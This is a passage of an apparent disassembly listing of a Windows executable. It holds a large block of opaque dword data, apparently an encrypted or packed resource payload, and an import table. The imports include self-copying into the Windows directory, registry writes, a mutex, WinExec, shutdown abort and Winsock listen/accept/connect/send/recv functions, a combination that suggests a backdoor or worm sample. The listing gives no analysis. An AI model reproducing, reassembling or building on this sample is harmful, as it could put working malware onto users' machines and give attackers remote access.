dd 8D4DE3F6h, 0C4AB3F0Ah, 75E04F77h, 4B1C91ADh, 685EC4CCh
dd 88DD0A03h, 0EED37A40h, 3E1AAA97h, 645EDADCh, 0B999EBD1h
dd 0D5F64A24h, 81B6040h, 5820B087h, 0F266F5F3h, 0C59E142Eh
dd 1FF1524Ah, 3030BD9Eh, 647FC5C4h, 0A28E103Bh, 0DCA94249h
dd 321A5074h, 6467BFB7h, 8F9CFFF8h, 0C8D93F19h, 18E47A67h
dd 3224B3B3h, 8A58D5EEh, 0EBB0130Fh, 0F7EF5F42h, 2D2D9E91h
dd 7757D8DBh, 0BF9E2E7Ch, 0FBD92C14h, 0E136C69h, 4D52BFBFh
dd 0A86FC6F6h, 0FDAF2B39h, 1DE56C68h, 6A06E386h, 9E62FBE6h
dd 0B4A91A1Fh, 0E6CE5732h, 20149C84h, 6149D5DEh, 0B49EE083h
dd 0EBD42C26h, 1018680Dh, 5E31BBBAh, 9169E0FAh, 0C7CD3A33h
dd 7AE54646h, 24368F9Bh, 6572DCAEh, 0CB96111Fh, 0F5DC5470h
dd 2208918Ch, 6F5DA887h, 8F96C1EFh, 0A6D8232Bh, 0EF77B5Dh
dd 452DB4ABh, 0B479FAD8h, 0D9BD0B0Ah, 0E5FC5F49h, 333F84BCh
dd 636AB5D0h, 0BC9A1F0Fh, 0E7E13425h, 5C356860h, 474DA583h
dd 939BFEE2h, 0C2A1261Ah
dd 30E66E4Fh, 4321A8DFh, 987AD4C0h, 0A3BF3E1Fh, 0EBC97454h
dd 924F790h, 5A7AFDEDh, 9CC1B3B2h, 0CFB50B0Ah, 0E386A6Eh
dd 6325A1BFh, 0BC05EEF3h, 0C3843A39h, 1DDA4D44h, 7F2EAD9Fh
dd 637EFFACh, 0BB850723h, 0E2C76E4Eh, 2C2E9889h, 7F62C283h
dd 0AB90D4EFh, 0D1D72C1Bh, 28F95677h, 2AAF5BD7h, 9D5A55B6h
dd 52D16363h, 7CB365A5h, 4036EE87h, 6172E3E2h, 802AF37Ch
dd 0C1FCEAB5h, 8234469h, 0BDA2369Bh, 66FCBEA2h, 3F3D5897h
dd 6FB836BDh, 0F6451B5Eh, 529729F4h, 0F3D85A7Ch, 85F460D1h
dd 0DE9CFB99h, 111896F0h, 52E2BFFAh, 9BB345D4h, 2D6359h
dd 0F2B5D0CEh, 208895FEh, 0B1A11B30h, 1C8F311Fh, 3C3EB4E6h
dd 279FFC2h, 96DE1A70h, 195B6666h, 5259D777h, 8DD1999Fh
dd 0DDC3AE4Bh, 0FECDB4CEh, 72FF9C9Bh, 21A7D6E5h, 0E3090E16h
dd 69CC6151h, 0AF6A7471h, 6F276960h, 8692B181h, 0CEE46D4Fh
dd 6C5568D4h, 0C9F589FEh, 9335F7EAh, 0E3E10903h, 5783BA51h
dd 0E80DE7E9h, 337BF15Ah, 0E29C2D2Ch, 8C3E6867h, 863D1D3h
dd 794D7674h, 7BE63DB7h, 4D64F076h, 71B14359h, 0A188F61Ah
dd 0E7630947h, 0EA017BC7h, 2E9A5958h, 449799F0h, 0B79BD7E2h
dd 3037492Dh, 94883F6Eh, 0DBF36462h, 7C666C07h, 12ABBE8Eh
dd 16647CA0h, 0FDB77962h, 307D0BCCh, 2B42D43Bh, 1C86C499h
dd 0B6FD45EAh, 0EE1EDA4Eh, 4168F069h, 27D0FDFFh, 0CCC87451h
dd 0F7A4FEB9h, 4DAB7A38h, 3DFFC4F5h, 0F83F0C4Ch, 0A7994F60h
dd 0AFDE153Fh, 3322DBB0h, 8BF2AC5Fh, 38C69A62h, 0EA695FEBh
dd 485EF0FBh, 0D78653Dh, 6665462Ch, 989E5AA5h, 5C78BC8Dh
dd 0A9B2CBCBh, 0E8FE9199h, 66EFAE55h, 8141977Bh, 3D3B8046h
dd 15E144E1h, 0CC1DEFAEh, 0DB74B966h, 1A353B7Dh, 467BFCD6h
dd 4C107EE8h, 9E856BDAh, 0E877C98Fh, 196CDB44h, 6CD2BC97h
dd 0B30C5AB7h, 79792348h, 0FC55BF6Eh, 29EC38C4h, 4EE57243h
dd 4F953030h, 0DC714DBFh, 2B1C3556h, 6D177089h, 5B112C0Ch
dd 0A96066DAh, 3046308Dh, 77569D9Eh, 8BCA1589h, 7B0AA229h
dd 0C55CDEC2h, 0C2997C8h, 0D15FFC75h, 7A2D3E3Fh, 5B72060Ch
dd 2033A19Dh, 73038E8Fh, 0ABF2787Dh, 0F405E692h, 364CDBFAh
dd 0FC78F4A4h, 0C1D86E82h, 0D2CC662Fh, 0D99CA2F4h, 1218969Fh
dd 4060B6B3h, 9CB34441h, 63135A5Bh, 4F3FBA9Eh, 0AD039595h
dd 435CA409h, 0E18F110Bh, 66201060h, 771FFFBh, 9FDE7070h
dd 0AD8082C9h, 0AC69FBF9h, 29021954h, 1E76DC87h, 0B75A5D38h
dd 2AB9A41h, 791584D6h, 819C64CAh, 0E0CF514Eh, 0AEE0E7A2h
dd 89CF13BAh, 871F8199h, 98B6322Fh, 19F27857h, 59710695h
dd 0DF066CC7h, 17A39CE7h, 0F99002F9h, 3ED64847h, 0CDDE228Eh
dd 7B109289h, 0BFD460ACh, 0A0E8D12Dh, 83F40CFAh, 43268894h
dd 0F922E881h, 58EC4373h, 61F7090Ch, 633DBBC7h, 0FE7D1E18h
dd 0A9245969h, 658D8A93h, 0EA51E4D3h, 85C556FFh, 395461AFh
dd 84A23434h, 5167097Dh, 2D123EBFh, 5CB793F0h, 25B84974h
dd 667D0FEEh, 5962EA54h, 0CC86DF6Bh, 0F0831630h, 0B3180750h
dd 0D59AC2Ch, 624C619Bh, 9EB42576h, 0BE69AFC4h, 6C370030h
dd 0A2B6CA04h, 0BF88A8Bh, 0A7BE50E1h, 3ED42894h, 0B7468D93h
dd 0F80EA005h, 11DCA0E5h, 6952117h, 485FF169h, 0FD51968Ah
dd 0DCD347D0h, 98AFCDC4h, 7D78AA06h, 1E1AECEBh, 9C9AF6B0h
dd 91692823h, 0F3F7683Bh, 50701D9Eh, 8F60D3D2h, 0B3D813EDh
dd 0FD8E1C0Bh, 0B1213E9Eh, 0AE1AB2BCh, 0D9F0A592h, 61E4AAB0h
dd 53506799h, 7981E0D1h, 756C8C7h, 0B4CC5E54h, 17E54B66h
dd 5B36868Bh, 0D48951ADh, 4FE1435Fh, 0BC914DF8h, 0AEE97734h
dd 4A31F3EFh, 0E0F588E1h, 0F3ED1FCAh, 0BF17EB43h, 0BD47E9F4h
dd 0C617EE0Bh, 72E13464h, 0D2C87B7Dh, 0D3A2BEBFh, 0C1298B5h
dd 2EC37DFDh, 0A686F2AAh, 0DBB0FD04h, 112DA544h, 25048E8Fh
dd 0AFE709DFh, 70891BF1h, 0DBCFBDDEh, 0FC23B8D9h, 0F19AD6E1h
dd 3314311Fh, 4C54C6BFh, 9FA240B9h, 0D7DEB0C7h, 193FE3B6h
dd 614A3C49h, 17004444h, 680796A5h, 0B2FA6C6Ch, 0FFF820A9h
dd 0C255E7F6h, 3336C53Eh, 94169A71h, 0E4D35272h, 3369998h
dd 705CB8A9h, 9398E7E4h, 0D1D52129h, 0BAB31268h, 0D817185Dh
dd 1589CE45h, 0BA900861h, 14C47FDEh, 0FFEE60F4h, 0B32082AFh
dd 0CFE5776Fh, 6AE639B0h, 3F8EFCFDh, 5232456Ch, 0E4FB8D8Dh
dd 0EE4CF834h, 8AB5B213h, 0D6E7B870h, 0C9842E59h, 0EBD75958h
dd 7BCF2947h, 7A4E6D67h, 345332B8h, 0CD28FD76h, 1FBD84C6h
dd 5F780BADh, 555CFA7h, 0BD029492h, 25375133h, 75BE0CBFh
dd 0B05FBB68h, 9C91BAE7h, 0C6ED5F58h, 0BB98B8BDh, 0B2E9FAC9h
dd 18D24FBFh, 0DC98D7D4h, 14474C20h, 664E203Ch, 6402Bh
dd 0D589AAAh, 87FE53D5h, 0B101D925h, 1A59DBC1h, 78D7035h
dd 0CDE221F2h, 0A9285D3Bh, 5B1B5B4Dh, 70A13996h, 0BF9BBA7h
dd 0A7BF5011h, 6C4DA998h, 8545DCDAh, 8C82BFEEh, 0B9BD7857h
dd 0D59B2D2Ah, 6441670Fh, 5973B786h, 0F803E983h, 0DB3B4271h
dd 0D6B50B3Ah, 0F038B59Bh, 6220E01Ah, 9A4B401Dh, 70214F2Fh
dd 38296222h, 8D73FBC2h, 363E6B19h, 0A00FDF6Bh, 3DECDDFBh
dd 0E62FE799h, 0D5EDD108h, 9CF94DFFh, 0E64984DEh, 64C927D1h
dd 0CFB21090h, 3ECD6F6Eh, 4D261E15h, 3258DAD8h, 31A8842Dh
dd 0F0E24444h, 0A098018Ch, 27EEF0FEh, 2FCD3B3Bh, 0A242004Ah
dd 2FBD7F7Fh, 5BB35299h, 5B188AD9h, 0F667CF9Ch, 0BCD3650Dh
dd 4667CAAh, 476EE597h, 26D2204Ah, 5F177A4Bh, 979E5538h
dd 538BFE86h, 0DDC6F04Eh, 0D47B196Fh, 0C6C46665h, 278A761Ah
dd 56DA1E8Fh, 76149689h, 0F2EA2BEEh, 8540F330h, 4D0FA7A5h
dd 3F172944h, 5D6681B1h, 9D85770Dh, 6211D980h, 78722D82h
dd 0DE362269h, 26345D6Ch, 78A10F78h, 0E656D6Dh, 92AD9Ch
dd 4758D56h, 5A6081Ch, 0E1E0C1AFh, 1A00F289h, 0EBEFD303h
dd 3190B3C6h, 69B12325h, 1F01555Ch, 0DEA69DADh, 4033C8A1h
dd 62E3ACA5h, 140DEEDDh, 5A70E3E0h, 0FCE7ED86h, 6AFC3E0Eh
dd 6A59C996h, 53120AC8h, 80C6A4B4h, 0C6A0353Dh, 2FB27E7Dh
dd 5928B7AEh, 0D52097CFh, 0ECB4060Dh, 0D69E0103h, 0E37A6AAh
dd 646BE6F4h, 0B8880D0Dh, 0F5DC0630h, 0C16797Dh, 7A4AB59Dh
dd 9A71F0C7h, 0C2AC3833h, 17E77243h, 7D308396h, 717CC8C9h
dd 0A68E2C03h, 0E9C95747h, 211B9E8Eh, 6A47869Ch, 0B192F2E3h
dd 0CED61B27h, 3B067279h, 4325A286h, 977BFAFFh, 0DEA01331h
dd 21F04B4Fh, 2B2E99AAh, 7376C3DEh, 0BEA51212h, 0F0C3504Ch
dd 37197660h, 5269B4A8h, 0E38EFFE5h, 0FC861D02h, 28D45941h
dd 50229087h, 9663CDD3h, 0E98A1C01h, 0ECF84045h, 0A3D8086h
dd 6A54CAC2h, 0B1BD0913h, 0F6D83030h, 26325569h, 5653A2BCh
dd 0BE01E1F7h, 0CAA02B39h, 7E25769h, 3A50E496h, 7242F9A8h
dd 0B7AC52E7h, 0E7CB4C5Ch, 3B1397D6h, 6640D0CCh, 0B598ADE5h
dd 0EEB7262Fh, 45364C47h, 492EB1BDh, 9B60F5FCh, 0F39E0A55h
dd 31E60576h, 6116A3A6h, 7574D989h, 0C6D10101h, 91A8D26Fh
dd 0D630FFFFh, 2D122228h, 8D724F8Bh, 0A7BD7F45h, 40AE80EAh
dd 0DA89DAEAh, 925CEBBFh, 5C66EE78h, 0DB991B00h, 3D70CC5Ch
dd 30A2D39Ch, 0F09D6783h, 0B45FFDCCh, 2BFF0636h, 459C9CC9h
dd 0E67B1D34h, 22C4667Dh, 42A1289Eh, 7EC61BE0h, 5A2A5Ch
dd 21DBDD97h, 7715BFFEh
dd 2665C7DAh, 142ABDB8h, 0E07A7ED4h, 77B5776Bh, 637B0D85h
dd 3CE9575Ch, 855597A7h, 4BC5375Dh, 49BD6AB7h, 1B2A6BE7h
dd 746EA9A5h, 0CAE07A9Bh, 0CCE06B38h, 1927B9D3h, 6A53DC3h
dd 0EBF5B7A5h, 0CFAF398Eh, 2694311h, 0CFB92721h, 0C620440Bh
dd 0CF11E664h, 6847D62Bh, 465CEEE5h, 5362F5E7h, 95C82B35h
dd 69AC7273h, 6B5E1991h, 0D87621C9h, 53717170h, 0ABF278ABh
dd 70891E71h, 0A3B289DEh, 0FC228885h, 0C1D86782h, 0D4DA6C2Fh
dd 1E26A3BDh, 466DE6E9h, 28BB7FC3h, 0AC98ACD0h, 617EE30Ah
dd 6F62D0CFh, 0BE57C6DAh, 27360D5Bh, 77BF0AC9h, 6C052FD6h
dd 6948A8C1h, 0C8DE1870h, 72F27636h, 63420A6Eh, 0E6D643C1h
dd 53A3A6F3h, 9395B4D9h, 0F3F29C11h, 4444E6F1h, 0EE61C99Ch
dd 0E8CF6162h, 0B00D877h, 0BB5ADCC0h, 3A347C27h, 0CFEF9E78h
dd 0C7FF3C3Dh, 6B435047h, 537983E9h, 0A56F738Dh, 41C0627Eh
dd 6E86181Dh, 463BAEABh, 9C64CCCBh, 40866829h, 0B4B7F7B8h
dd 0AFE47AF2h, 1F268893h, 8766F04Fh, 13B1735Ah, 6F5BFE8Dh
dd 0B0C39FCDh, 0EB31BFD2h, 0B0C331CAh, 0C0001F1Eh, 3B62FDBCh
dd 0DCAA24F0h, 2EDC5E43h, 745DC6C8h, 0F5E23E9Fh, 172C8E9Fh
dd 7A5400D5h, 0A1B7796Ah, 46199A82h, 7812D4E4h, 0F26D98F0h
dd 0B7CF3732h, 0E96CA525h, 4268C60Bh, 7D476F35h, 5A6FF954h
dd 0C0A80A1Bh, 0E2E3066Ah, 1D03E561h, 0B2A8DCDFh, 32410201h
dd 6CB43AF0h, 0EFDC2482h, 3E0E908Ch, 8DFA98E3h, 0EC722C2Bh
dd 0B7A00E02h, 3E36CB3Bh, 9F6CBC7Ch, 0CEAF7154h, 0B5465852h
dd 0DCC53E92h, 0FDB31456h, 0F9935766h, 38632944h, 0FFAF1D12h
dd 0CE00EB23h, 9CA33B6Ch, 7A9ADB05h, 0CBA10709h, 141BA8F0h
dd 8D86E7D4h, 1B3B8174h, 634C3E43h, 78108280h, 0BE57C9C7h
dd 98F9CBA2h, 0EC6D2412h, 3F67C5CAh, 7003466Ch, 0CAED9B07h
dd 0C7F43938h, 52DA9B1h, 5775ED8Ah, 750988C5h, 0A58C620Fh
dd 6A8218FBh, 630F8AD8h, 975AEAFBh, 0FAB71108h, 15677A29h
dd 466DC437h, 0F3973927h, 0B9E74956h, 96AD3FF7h, 0A4736F52h
dd 1114D35Ch, 3468028Fh, 26C3654Bh, 40A4DCA4h, 611CB6DEh
dd 0D7F6305Bh, 55A6B5Ah, 690ABC23h, 1C64C6EBh, 4428D1EDh
dd 0D7ECE8D2h, 4F4BC645h, 9E8011E2h, 15825230h, 0ED04A680h
dd 3AA2572Fh, 88902233h, 0D798E70h, 31644ABh, 9B887171h
dd 0BEEE7479h, 1F2ED2C9h, 8CD0C18Dh, 0DEC4AAC6h, 0A3BD24DFh
dd 0DD0D1211h, 2E75CF60h, 59B711C5h, 51D0524Eh, 8169D9ABh
dd 445BE104h, 4469E5B2h, 9BA03931h, 0D8E77913h, 18E4FC02h
dd 9A36F8EBh, 0D17F824Dh, 3AC15350h, 6E871C7Fh, 0C0F953DCh
dd 0A31193BAh, 931ED4E5h, 0D1752F1Dh, 0C99D0B03h, 200B7405h
dd 51E37E7Eh, 9AB24653h, 5EE8E689h, 4D69CFCDh, 0EB029592h
dd 9C65CFA6h, 0B10F202Eh, 3B53E473h, 6BCC21F9h, 53223D6Fh
dd 8B9319F9h, 24313A7Ch, 4A5D7B2h, 490D8485h, 0A1886623h
dd 0DBFDF2E4h, 2C73F572h, 7F21EF9Ah, 87EECAE5h, 0E96B7625h
dd 4269C753h, 8C117035h, 0CDE374FFh, 19A57BB0h, 0D85FFE00h
dd 2D146040h, 1C7C4D8Bh, 0A6BF617Eh, 6DEF177Fh, 0A7B5DEB0h
dd 0F83F8D65h, 0B22A9FE5h, 829A4DAFh, 0DDED61F0h, 0E159714h
dd 80B86C16h, 0B405D7BEh, 9DF30836h, 227B48C4h, 548D9291h
dd 0AEF67893h, 26416ADh, 51AE1C17h, 0FF16A833h, 4D3A4533h
dd 76F61006h, 7F4BC862h, 0C79133BDh, 6BF1B3A3h, 69E5A149h
dd 0F1F0F0F2h, 2A72F46Dh, 0E46F99F2h, 0E7CD5F5Eh, 0BB06DA70h
dd 0CD58DAC4h, 8B098BEAh, 0FBD23BE1h, 26A76A39h, 722974F4h
dd 14D205D0h, 0F3F6C388h, 0ECAF4D05h, 4FC71E17h, 3EA95AD1h
dd 0A6057F5Eh, 0ACF7216Eh, 0CC919D5h, 77720F52h, 0D3F5DB5h
dd 0FCCD7A7Bh, 0B98E3876h, 66542825h, 0C1CEEEFh, 9FDBE8A8h
dd 0A6B77375h, 3FC35350h, 0C818E1FFh, 0CD3F4330h, 6E1EED6Bh
dd 0EDA03230h, 1E32A7F5h, 3FEB2944h, 556481B1h, 9D855274h
dd 79980D61h, 794D1BBBh, 0EE05927Eh, 0D7EE7B5Ch, 87C6232Bh
dd 0E7D0D73h, 8DF2EACh, 0A1EB9922h, 8EA6383Fh, 74B34071h
dd 4967C2F2h, 0F3341277h, 643E4D7Dh, 0DC0C476Ch, 2F76F428h
dd 0E039381Eh, 37D16353h, 4FB9D7A5h, 2F92C5EDh, 5877E2B3h
dd 0FC5BED86h, 6D2F3E0Eh, 0CB5D7A03h, 95BA3743h, 0E5CCA271h
dd 43059E3h, 87E80A6Dh, 0CAB22987h, 1805D6C2h, 0C1AFE760h
dd 4A15DAC5h, 0F6EE3BD8h, 11189646h, 216ADB8Ch, 64E0FCAFh
dd 5055BA9Ch, 498350CEh, 0ED03A581h, 81A1712Eh, 898F216Ah
dd 0C788F71h, 0FCA42BAAh, 0C7DE405Eh, 9632741h, 5259DB5Ch
dd 182EC0C0h, 0F30D0040h, 4BB94B7Bh, 9880EF18h, 2D401488h
dd 0DDF62E16h, 47996151h, 4DB92AB3h, 0BCA26FEBh, 9A435BEh
dd 4B6D7677h, 939A0C3Fh, 0A726026Bh, 2E199A53h, 0EC3A098Ch
dd 0A8C0F6D5h, 3D463316h, 6348B78Bh, 0F978A3CBh, 0E8166867h
dd 0A86DBBD3h, 0B1E2F3C1h, 3DA2B748h, 5DEB7D79h, 0A98144C7h
dd 55FA8407h, 0A93CFEFCh, 0DA318007h, 0C5950858h, 0E1724F1Dh
dd 3A62C8F7h, 0FE8512Bh, 0C5D86EEAh, 75A25E33h, 6057FE4Dh
dd 7B941BEh, 58F1B3A8h, 24B8B6B1h, 657D0CE7h, 1B59515Ah
dd 383499A9h, 0E69C9C5Ch, 2A974F75h, 715F5F16h, 92E2AF9Fh
dd 0CCD25F80h, 15A7FABFh, 576DFC3Ah, 98BB0DF6h, 0E2C7B994h
dd 0CFEC1E01h, 6C8C150Ah, 77DD258Ah, 7D0DAF8Ch, 0C3576AA6h
dd 0B992B28h, 786ED375h, 45A876B6h, 0B3BBC244h, 4A9D4041h
dd 0AC83C705h, 0A6B02A3Ch, 0E8CEA0BEh, 15F81DDDh, 728A07D7h
dd 0F94C33D3h, 1FE35751h, 0F3FDE9E5h, 87633201h, 0B763BC41h
dd 47A78A5Fh, 9A588E9Ah, 0D7654453h, 6053CC67h, 767A5301h
dd 166BFEE0h, 37824329h, 0B902F58h, 31D6338h, 60FEF26h
dd 8E6D6231h, 5651C770h, 0D0503CDEh, 1B00F2D8h, 0A47EDE4Ah
dd 2D32416Ah, 6A8113ABh, 18518EBh, 0C625AAACh, 8AFF534Ah
dd 0CBE36709h, 3630809Ch, 62489DD5h, 0DBEB171Ch, 0F0C5021Ch
dd 3E1F6576h, 4245BAE9h, 9294ACB2h, 84F82420h, 3BFC5436h
dd 4621B1ACh, 927B8AC5h, 0B3F7050Ch, 0EFA11F4Ch, 6C41C4C9h
dd 664CD3CDh, 0F7DC42E8h, 0FBDA202Dh, 50447F62h, 5E4AA3EFh
dd 0CF3EF0F9h, 0D6BB3439h, 47B55345h, 1268D8C7h, 626BCDC2h
dd 0C5E0151Ch, 65ABD3Ch, 6359E076h, 9A6070C1h, 7001816Eh
dd 9C384239h, 60D5A65h, 0A58722A3h, 0EF841062h, 9CF5152h
dd 7B7CA41Bh, 0AA2F421Eh, 7F308E32h, 0CEA3FD8Fh, 4B75E318h
dd 16323FDDh, 0F7409E83h, 0C04A7C2h, 0A9C0507Eh, 6E86407Fh
dd 0C5A386DCh, 8EEF5D5Fh, 0A45BE348h, 99C1E1Dh, 854AF2C6h
dd 231A35F6h, 524F8E83h, 9BCFCE9Ah, 78C2BC85h, 0D6C0CEFDh
dd 248A5037h, 0D4A52B2h, 75BD31E1h, 88D6F1Fh, 602B0560h
dd 0BCE0681Dh, 0AB8E3643h, 253BC553h, 63028253h, 0A9F1BF58h
dd 2A8AAAA2h, 35F8C90Eh, 2C42E4E4h, 0B75FDCA7h, 8AFF2B60h
dd 7CC16676h, 0BD7DC19Eh, 351D504Fh, 0CDAF203Eh, 0C295284Fh
dd 236E5048h, 4E72F8CEh, 67F78ADBh, 5841AE11h, 5CD793EBh
dd 1A2DBEAh, 7F03F49h, 80D7ED99h, 0C1D4657Ch, 0B67875FFh
dd 59194949h, 0DCA72E3Fh, 67515DC5h, 1E223AF9h, 0A735FEF8h
dd 17006F80h, 0F996076Bh, 740F1254h, 0BAF1D1Eh, 33B4F7Dh
dd 47D49293h, 775ECEC8h, 588E2AC5h, 0FC2BBDBCh, 260F7CDBh
dd 9EB648AFh, 8EFD530Ch
dd 2971FAE8h, 0EF07AA7Eh, 86333A5Dh, 49B191A9h, 0B633E9D7h
dd 56A12E8Fh, 0CBE14343h, 214F334Dh, 0BC930103h, 1B31C2D0h
dd 0ADC809EFh, 0AD394114h, 0E1821412h, 0EE44E586h, 0A6371FF8h
dd 43576B21h, 77982A29h, 665DF9ADh, 892DB4B4h, 0D1E77991h
dd 94F17CC9h, 5B92810Bh, 5FB9CAC9h, 0C6DDAFAFh, 7F475A74h
dd 98891B19h, 0C9B11D79h, 0FCDA27ABh, 83526B6Ah, 96D5BA27h
dd 481737DFh, 17C27B89h, 9D674883h, 0B731CF55h, 897A3C3Ah
dd 0D8C02C99h, 0ED04397Dh, 9557D75Bh, 74901210h, 0D65CC78h
dd 0FF7444ABh, 4CD08E8Eh, 8DA537B9h, 63494970h, 47A4C1F1h
dd 362A85BBh, 5C45B11Bh, 22016F63h, 2E45B7F2h, 0A2F4177Ch
dd 34C41861h, 4E862892h, 5421EEECh, 0A26410Bh, 6A162078h
dd 96483C8Ch, 72EA7F1h, 8D07C795h, 0E4790A00h, 20A75352h
dd 91788287h, 0D19C3623h, 714B5C5Dh, 0F5D46522h, 82DCA23Dh
dd 0C34AB7D9h, 1027E63Fh, 0F5AAB97Eh, 0BA926463h, 0D4504181h
dd 0A0B6DF87h, 0EB32A4B4h, 0C3C01060h, 7DC4A91Dh, 0B843A7E2h
dd 8A18F2CAh, 0F6ED40EAh, 83E13434h, 6238B9F8h, 35A6DB6Dh
dd 84F00BE1h, 91BFF7C9h, 697E103Fh, 0D3BF4150h, 0D1BD6565h
dd 48CE5050h, 4CB84BB0h, 5DEC14EAh, 0F71E8080h, 0FDC8B8E3h
dd 9924B63Bh, 0DA6F3130h, 2D04D550h, 88ABDA8Bh, 0A00AAE50h
dd 93852725h, 266B94Fh, 0FFBA5EA0h, 42D55756h, 0B2B0E0BEh
dd 0B7D57FF0h, 0F1258798h, 0E3DA7FC9h, 0D4F1441h, 5D46245Bh
dd 133C6848h, 2A0092A1h, 0AEC658BFh, 72E6431Ch, 13BC0E60h
dd 0F4EA897h, 0BC59AF62h, 0CA20427h, 87E43A37h, 0D4234E42h
dd 0EAE4FB06h, 8F8A8A48h, 117D250Dh, 56C3B2CEh, 816B95BCh
dd 5DAD4C2Bh, 856CDAE7h, 1BB0EF9Dh, 0EEE25053h, 341D8BA6h
dd 0BD571458h, 4459A986h, 1C32E17Ch, 441FE98Ah, 0D342B0B0h
dd 4FC79E2Dh, 0CEFD57E9h, 7C0DAFB1h, 3DB56D35h, 0F29B2D10h
dd 4736A6CAh, 86234AB5h, 80E810BFh, 3E3BBF10h, 0DF743629h
dd 1CB8C30Eh, 0BBC1AFCCh, 6A475520h, 8C82F41Eh, 48A71E20h
dd 9CEB595Ah, 0C2AED4A8h, 364B3230h, 4D65D84Dh, 133A54BBh
dd 0F82D8181h, 9D85FF46h, 61930D0Bh, 0EA40D2D0h, 0BA8897B2h
dd 9D065178h, 491DBA2h, 3EBE88FFh, 8F1BADACh, 94D05626h
dd 632722BCh, 545BD64Bh, 0E5DEC52Ah, 0DB37E677h, 9 dup(0)
dd 1900h dup(?)
_rsrc ends
; Section 3. (virtual address 00021000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00018600
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_idata segment para public 'CODE' use32
assume cs:_idata
;org 421000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 21064h, 2 dup(0)
dd 21188h, 5000h, 21078h, 2 dup(0)
dd 211DCh, 5014h, 21144h, 2 dup(0)
dd 2150Ah, 50E0h, 2114Ch, 2 dup(0)
dd 21522h, 50E8h, 5 dup(0)
dd 21196h, 211AEh, 211BCh, 211CEh, 0
dd 211EAh, 211FAh, 21204h, 2120Eh, 21218h, 21222h, 2122Ah
dd 21234h, 2123Eh, 21254h, 21264h, 2126Eh, 2127Eh, 2128Eh
dd 2129Eh, 212AAh, 212C2h, 212D4h, 212E2h, 212F2h, 212FEh
dd 2130Ah, 21314h, 21320h, 21332h, 21344h, 2135Ah, 21366h
dd 21372h, 2137Eh, 2138Ch, 2139Ah, 213A8h, 213B6h, 213C6h
dd 213D6h, 213EAh, 213FCh, 2140Eh, 2141Ch, 2142Ah, 2143Eh
dd 21452h, 2146Eh, 21488h, 214A2h, 214B8h, 214D0h, 214EAh
dd 214FAh, 0
dd 21516h, 0
dd 2152Eh, 21538h, 21540h, 21548h, 21550h, 2155Ah, 21564h
dd 2156Eh, 2157Ch, 21588h, 21594h, 215A4h, 215B2h, 215BAh
dd 0
dd 61766461h, 32336970h, 6C6C642Eh, 0
aAbortsystems_0 db 'AbortSystemShutdownA',0
align 10h
aRegopenkeya_0 db 'RegOpenKeyA',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegclosekey_0 db 'RegCloseKey',0
aKernel32_dll db 'kernel32.dll',0
align 4
aLoadlibrarya_0 db 'LoadLibraryA',0
align 4
aLstrcpy db 'lstrcpy',0
dd 6C5F0000h, 736F6C63h, 65h, 7277685Fh, 657469h, 6C5F0000h
dd 61657263h, 74h, 65656C53h, 70h, 6572685Fh, 6461h, 6C5F0000h
dd 6E65706Fh, 0
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
dd 72430000h, 65746165h, 65726854h, 6461h, 69570000h, 6578456Eh
dd 63h, 4C746547h, 45747361h, 726F7272h, 0
aGettickcount db 'GetTickCount',0
align 10h
aCreatemutexa db 'CreateMutexA',0
align 10h
aCopyfilea db 'CopyFileA',0
align 4
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 4
aGetprocaddress db 'GetProcAddress',0
align 4
dd 65480000h, 65527061h, 6F6C6C41h, 63h, 74726956h, 416C6175h
dd 636F6C6Ch, 0
aHeapalloc db 'HeapAlloc',0
align 10h
aGetoemcp db 'GetOEMCP',0
align 4
aGetacp_0 db 'GetACP',0
align 4
dd 65470000h, 49504374h, 6F666Eh, 65470000h, 72745374h
dd 54676E69h, 57657079h, 0
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 754D0000h, 4269746Ch, 54657479h, 6469576Fh, 61684365h
dd 72h, 74697257h, 6C694665h, 65h, 556C7452h, 6E69776Eh
dd 64h, 70616548h, 65657246h, 0
aVirtualfree_0 db 'VirtualFree',0
dd 65480000h, 72437061h, 65746165h, 0
aHeapdestroy db 'HeapDestroy',0
dd 65470000h, 6C694674h, 70795465h, 65h, 614D434Ch, 72745370h
dd 57676E69h, 0
aLcmapstringa db 'LCMapStringA',0
align 4
aGetmodulehan_0 db 'GetModuleHandleA',0
align 4
aGetstartupin_0 db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentpr_0 db 'GetCurrentProcess',0
align 4
aUnhandledexc_0 db 'UnhandledExceptionFilter',0
align 10h
aFreeenvironm_0 db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aLockresource db 'LockResource',0
align 4
aGetstdhandle db 'GetStdHandle',0
align 2
aUser32_dll db 'user32.dll',0
align 4
aWsprintfa db 'wsprintfA',0
aWs2_32_dll db 'ws2_32.dll',0
align 10h
aAccept db 'accept',0
align 4
dd 65720000h, 7663h, 65730000h, 646Eh, 74680000h, 736E6Fh
dd 6F730000h, 74656B63h, 0
aConnect db 'connect',0
dd 696C0000h, 6E657473h, 0
aGethostname db 'gethostname',0
dd 6E690000h, 6E5F7465h, 616F74h, 6E690000h, 615F7465h
dd 726464h, 65670000h, 736F6874h, 6E796274h, 656D61h, 53570000h
dd 61745341h, 70757472h, 0
aBind db 'bind',0
align 4
aClosesocket db 'closesocket',0
align 1000h
_idata ends
end